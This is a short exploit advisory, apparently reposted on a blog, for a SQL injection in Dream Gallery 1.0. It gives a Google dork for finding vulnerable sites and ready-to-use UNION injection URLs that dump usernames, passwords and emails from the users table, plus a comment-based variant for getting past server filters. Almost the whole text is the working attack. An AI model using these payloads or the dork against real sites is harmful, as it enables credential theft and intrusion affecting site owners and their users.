# Exploit Title: Dream Gallery 1.0 SQL Injection
# Google Dork: intext: "Rafael Clares"
# Date: 2017 / 12 / 01
# Exploit Author: Zerones
# Vendor Homepage: N/A
# Software Link: N/A
# Version: 1.0 and to the top
# Tested on: windows 8.1 - FireFox 57.0.1
# CVE : N/A
http://target.com/bessa/galeria/album.php?id=[sqli]
For Example:
http://target.com/bessa/galeria/album.php?id=-14+union+select+1,group_concat(user_login,0x3a,user_password,0x3a,user_email),3,4,5,6,7,8,9+from+users
Sometimes you will encounter an error that is a server error and requires a bypass like:
http://target.com/bessa/galeria/album.php?id=-14+/*!50000union*/+select+1,unhex(hex(group_concat(user_login,0x3a,user_password,0x3a,user_email))),3,4,5,6,7,8,9+from+users
Aucun commentaire:
Enregistrer un commentaire